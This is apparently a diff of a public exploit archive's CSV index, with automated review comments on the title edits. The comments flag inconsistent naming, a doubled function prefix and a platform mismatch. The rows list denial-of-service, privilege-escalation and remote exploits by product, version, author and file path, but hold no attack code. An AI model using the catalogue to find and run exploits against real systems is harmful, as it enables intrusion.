22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 - Crash (PoC)",2012-11-12,coolkaveh,windows,dos,0
|
||||
22660,platforms/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,dos,0
|
||||
22666,platforms/windows/dos/22666.txt,"Softrex Tornado WWW-Server 1.2 - Buffer Overflow",2003-05-28,D4rkGr3y,windows,dos,0
|
||||
22667,platforms/windows/dos/22667.txt,"BaSoMail 1.24 - POP3 Server Denial of Service",2003-05-28,"Ziv Kamir",windows,dos,0
|
||||
22668,platforms/windows/dos/22668.txt,"BaSoMail 1.24 - SMTP Server Command Buffer Overflow",2003-05-28,"Ziv Kamir",windows,dos,0
|
||||
22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0
|
||||
22670,platforms/windows/dos/22670.c,"Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service",2003-05-28,Neo1,windows,dos,0
|
||||
22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash (PoC)",2012-11-13,coolkaveh,windows,dos,0
|
||||
22680,platforms/windows/dos/22680.txt,"IrfanView - '.RLE' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
|
||||
22681,platforms/windows/dos/22681.txt,"IrfanView - '.TIF' Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0
|
||||
|
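Review bot: Rows 22650 and 22670 leave the HTTP method names bare ("POST / HEAD", "PROPFIND / SEARCH"), whereas other rows in this file quote command names ('HEAD' in row 1220, 'RETR' in row 1251, 'LIST' in row 10100). Suggest "'POST' / 'HEAD'" and "'PROPFIND' / 'SEARCH'" to match. The version string "1.0 4" in row 22650 is carried over unchanged; since the title is being edited anyway, it is worth confirming that the space is intended.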
@ -3491,7 +3491,7 @@ id,file,description,date,author,platform,type,port
|
|||
27051,platforms/windows/dos/27051.txt,"Microsoft Windows - Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0
|
||||
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
|
||||
27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer '.JPEG'/.PICT' File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0
|
||||
27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0
|
||||
27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0
|
||||
27089,platforms/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (1)",2006-01-11,ZwelL,windows,dos,0
|
||||
27090,platforms/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)",2006-01-15,ZwelL,windows,dos,0
|
||||
27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 - BlueTooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos,0
|
||||
|
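Review bot: Row 27082 changes "Malformed IMG and XML Parsing" to "Malformed .IMG / .XML Parsing", and the added dots make both terms read as file extensions, which the old title did not say. Unless the underlying advisory is about files with those extensions, drop the dots; if extensions are meant, quote them the way other rows in the file do ('.pls', '.m3u', '.RLE').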
@ -3910,7 +3910,7 @@ id,file,description,date,author,platform,type,port
|
|||
30956,platforms/linux/dos/30956.txt,"CoolPlayer 2.17 - 'CPLI_ReadTag_OGG()' Buffer Overflow",2007-12-28,"Luigi Auriemma",linux,dos,0
|
||||
30934,platforms/windows/dos/30934.txt,"Total Player 3.0 - '.m3u' File Denial of Service",2007-12-25,"David G.M.",windows,dos,0
|
||||
30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0
|
||||
30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
|
||||
30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0
|
||||
30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0
|
||||
30985,platforms/linux/dos/30985.txt,"libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities",2007-12-30,"Devon Miller",linux,dos,0
|
||||
30989,platforms/multiple/dos/30989.txt,"Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0
|
||||
|
@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port
|
|||
33951,platforms/windows/dos/33951.txt,"Baidu Spark Browser 26.5.9999.3511 - Remote Stack Overflow (Denial of Service)",2014-07-02,LiquidWorm,windows,dos,0
|
||||
33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 - '.asx' Remote Denial of Service",2010-05-10,"Steve James",windows,dos,0
|
||||
33977,platforms/windows/dos/33977.txt,"Torque Game Engine - Multiple Denial of Service Vulnerabilities",2010-05-09,"Luigi Auriemma",windows,dos,0
|
||||
34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
|
||||
34010,platforms/win_x86/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)",2014-07-08,"Drozdova Liudmila",win_x86,dos,0
|
||||
34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 - Nested Directory Tree Local Denial of Service",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
|
||||
34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 - 'in.ftpd' Long Command Handling Security",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
|
||||
34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal",2010-05-28,"John Leitch",windows,dos,0
|
||||
|
@ -4325,7 +4325,7 @@ id,file,description,date,author,platform,type,port
|
|||
34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0
|
||||
34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0
|
||||
34261,platforms/multiple/dos/34261.txt,"Unreal Engine 2.5 - 'UpdateConnectingMessage()' Remote Stack Buffer Overflow",2010-07-06,"Luigi Auriemma",multiple,dos,0
|
||||
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0
|
||||
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-07,"Luigi Auriemma",multiple,dos,0
|
||||
34278,platforms/linux/dos/34278.txt,"LibTIFF 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service",2010-07-12,"Tom Lane",linux,dos,0
|
||||
34279,platforms/linux/dos/34279.txt,"LibTIFF 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service",2010-06-14,"Tom Lane",linux,dos,0
|
||||
34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader 9.3.4 - 'AcroForm.api' Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0
|
||||
|
@ -5003,7 +5003,7 @@ id,file,description,date,author,platform,type,port
|
|||
39428,platforms/windows/dos/39428.txt,"PotPlayer 1.6.5x - '.mp3' Crash (PoC)",2016-02-09,"Shantanu Khandelwal",windows,dos,0
|
||||
39429,platforms/windows/dos/39429.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1)",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
|
||||
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
|
||||
39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
|
||||
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0
|
||||
|
@ -5052,7 +5052,7 @@ id,file,description,date,author,platform,type,port
|
|||
39543,platforms/linux/dos/39543.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'cdc_acm' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
|
||||
39544,platforms/linux/dos/39544.txt,"Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - 'aiptek' Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
|
||||
39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
|
||||
39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
|
||||
39546,platforms/windows/dos/39546.txt,"Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
|
||||
39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0
|
||||
39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
|
||||
39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
|
||||
|
@ -5216,7 +5216,7 @@ id,file,description,date,author,platform,type,port
|
|||
40253,platforms/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0
|
||||
40255,platforms/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40256,platforms/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40308,platforms/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
|
||||
40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0
|
||||
40291,platforms/linux/dos/40291.txt,"Eye of Gnome 3.10.2 - GMarkup Out of Bounds Write",2016-08-23,"Kaslov Dmitri",linux,dos,0
|
||||
|
@ -5365,7 +5365,7 @@ id,file,description,date,author,platform,type,port
|
|||
41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
|
||||
41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
|
||||
41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0
|
||||
41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0
|
||||
41211,platforms/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",android,dos,0
|
||||
41212,platforms/android/dos/41212.txt,"Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation",2017-02-01,"Google Security Research",android,dos,0
|
||||
41213,platforms/osx/dos/41213.html,"Apple WebKit - 'HTMLFormElement::reset()' Use-After Free",2017-02-01,"Google Security Research",osx,dos,0
|
||||
41214,platforms/multiple/dos/41214.html,"Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion",2017-02-01,"Google Security Research",multiple,dos,0
|
||||
|
@ -5419,7 +5419,7 @@ id,file,description,date,author,platform,type,port
|
|||
41637,platforms/windows/dos/41637.py,"FTPShell Server 6.56 - 'ChangePassword' Buffer Overflow",2017-03-19,ScrR1pTK1dd13,windows,dos,0
|
||||
41639,platforms/windows/dos/41639.txt,"ExtraPuTTY 0.29-RC2 - Denial of Service",2017-03-20,hyp3rlinx,windows,dos,0
|
||||
41643,platforms/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
- Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",hardware,dos,0
|
||||
41645,platforms/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos,0
|
||||
41645,platforms/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",windows,dos,0
|
||||
41646,platforms/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
|
||||
41647,platforms/windows/dos/41647.txt,"Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
|
||||
41648,platforms/windows/dos/41648.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)",2017-03-20,"Google Security Research",windows,dos,0
|
||||
|
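Review bot: the replacement line for 41645 still reads "nt!nt!HvpGetBinMemAlloc", with the module prefix doubled. Since this description is being rewritten anyway, make it "nt!HvpGetBinMemAlloc" so it matches the "nt!ExpFindAndRemoveTagBigPages" form beside it. Separately, the 41643 context record appears here with a line break inside its quoted description (after "Google Nest Cam 5.2.1"). If that break is in the file and not only in this rendering, it splits the record for any line-based consumer of the CSV and should be joined in the same cleanup.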
@ -5506,7 +5506,7 @@ id,file,description,date,author,platform,type,port
|
|||
42006,platforms/windows/dos/42006.cpp,"Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token",2017-05-15,"Google Security Research",windows,dos,0
|
||||
42007,platforms/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - nt!NtTraceControl (EtwpSetProviderTraits) Pool Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
|
||||
42008,platforms/windows/dos/42008.cpp,"Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
|
||||
42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0
|
||||
42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0
|
||||
42014,platforms/ios/dos/42014.txt,"Apple iOS < 10.3.2 - Notifications API Denial of Service",2017-05-17,CoffeeBreakers,ios,dos,0
|
||||
42017,platforms/multiple/dos/42017.txt,"Adobe Flash - AVC Deblocking Out-of-Bounds Read",2017-05-17,"Google Security Research",multiple,dos,0
|
||||
42018,platforms/multiple/dos/42018.txt,"Adobe Flash - Margin Handling Heap Corruption",2017-05-17,"Google Security Research",multiple,dos,0
|
||||
|
@ -5703,6 +5703,7 @@ id,file,description,date,author,platform,type,port
|
|||
42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0
|
||||
42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0
|
||||
42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0
|
||||
42970,platforms/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow",2017-10-10,"Agostino Sarubbo",linux,dos,0
|
||||
42962,platforms/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",windows,dos,0
|
||||
42969,platforms/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
|
@ -5794,9 +5795,9 @@ id,file,description,date,author,platform,type,port
|
|||
317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0
|
||||
319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local,0
|
||||
320,platforms/linux/local/320.pl,"suid_perl 5.001 - Exploit",1996-06-01,"Jon Lewis",linux,local,0
|
||||
321,platforms/multiple/local/321.c,"BSD & Linux umount - Privilege Escalation",1996-08-13,bloodmask,multiple,local,0
|
||||
321,platforms/multiple/local/321.c,"BSD / Linux - 'umount' Privilege Escalation",1996-08-13,bloodmask,multiple,local,0
|
||||
322,platforms/linux/local/322.c,"Xt Library - Privilege Escalation",1996-08-24,"b0z0 bra1n",linux,local,0
|
||||
325,platforms/linux/local/325.c,"BSD & Linux lpr - Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0
|
||||
325,platforms/linux/local/325.c,"BSD / Linux - 'lpr' Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0
|
||||
328,platforms/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local,0
|
||||
330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0
|
||||
331,platforms/linux/local/331.c,"LibXt - 'XtAppInitialize()' Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0
|
||||
|
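Review bot: after the retitle, 321 and 325 both read "BSD / Linux - ...", but 321 sits under platforms/multiple with platform "multiple" while 325 stays under platforms/linux with platform "linux". Either the title or the platform column of 325 is now misleading for anyone filtering by platform. Align the two rows or keep the BSD mention out of the 325 title.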
@ -5880,7 +5881,7 @@ id,file,description,date,author,platform,type,port
|
|||
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
|
||||
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
|
||||
796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0
|
||||
798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure",2005-02-08,Kozan,windows,local,0
|
||||
798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0
|
||||
803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0
|
||||
811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local Exploit",2005-02-10,Kozan,windows,local,0
|
||||
816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0
|
||||
|
@ -8594,7 +8595,7 @@ id,file,description,date,author,platform,type,port
|
|||
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
|
||||
33589,platforms/lin_x86-64/local/33589.c,"Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Privilege Escalation (3)",2014-05-31,"Vitaly Nikolenko",lin_x86-64,local,0
|
||||
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
|
||||
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
|
||||
33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0
|
||||
33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0
|
||||
33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
|
||||
33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0
|
||||
|
@ -8643,7 +8644,7 @@ id,file,description,date,author,platform,type,port
|
|||
35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0
|
||||
35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Privilege Escalation",2014-10-22,"Glafkos Charalambous",windows,local,0
|
||||
35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - '.wav' Buffer Overflow",2014-10-27,metacom,windows,local,0
|
||||
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
|
||||
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
|
||||
35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)",2014-10-28,Metasploit,windows,local,0
|
||||
35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0
|
||||
35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Privilege Escalation (2)",2012-01-12,zx2c4,linux,local,0
|
||||
|
@ -9284,7 +9285,8 @@ id,file,description,date,author,platform,type,port
|
|||
42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0
|
||||
42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0
|
||||
42960,platforms/win_x86-64/local/42960.txt,"Microsoft Windows 10 RS2 (x64) - 'win32kfull!bFill' Pool Overflow",2017-10-06,siberas,win_x86-64,local,0
|
||||
42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0
|
||||
42963,platforms/windows/local/42963.py,"ASX to MP3 converter < 3.1.3.7 - '.asx' Stack Overflow (DEP Bypass)",2017-10-08,"Nitesh Shilpkar",windows,local,0
|
||||
42974,platforms/windows/local/42974.py,"ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow",2017-10-11,"Parichay Rai",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
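Review bot: the retitled 42963 and the newly added 42974 name the same product two ways, "ASX to MP3 converter < 3.1.3.7" and "ASX to MP3 3.1.3.7", and differ in version form as well. A title search or dedup keyed on the product string will treat them as unrelated. Pick one product name for both rows, and confirm whether 42974 is meant to be "< 3.1.3.7" or the exact version.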
@ -9600,7 +9602,7 @@ id,file,description,date,author,platform,type,port
|
|||
969,platforms/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,windows,remote,21
|
||||
970,platforms/linux/remote/970.c,"Snmppd - SNMP Proxy Daemon Remote Format String",2005-04-29,cybertronic,linux,remote,164
|
||||
975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow",2005-05-01,muts,windows,remote,21
|
||||
976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0
|
||||
976,platforms/windows/remote/976.cpp,"Microsoft Windows - WINS Vulnerability + OS/SP Scanner",2005-05-02,class101,windows,remote,0
|
||||
977,platforms/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0
|
||||
979,platforms/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,windows,remote,0
|
||||
981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b (Linux) - Format String Exploit",2005-05-05,cybertronic,linux,remote,25
|
||||
|
@ -10915,7 +10917,7 @@ id,file,description,date,author,platform,type,port
|
|||
15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0
|
||||
15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0
|
||||
15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
|
||||
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
|
||||
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0
|
||||
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
|
||||
15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
|
||||
|
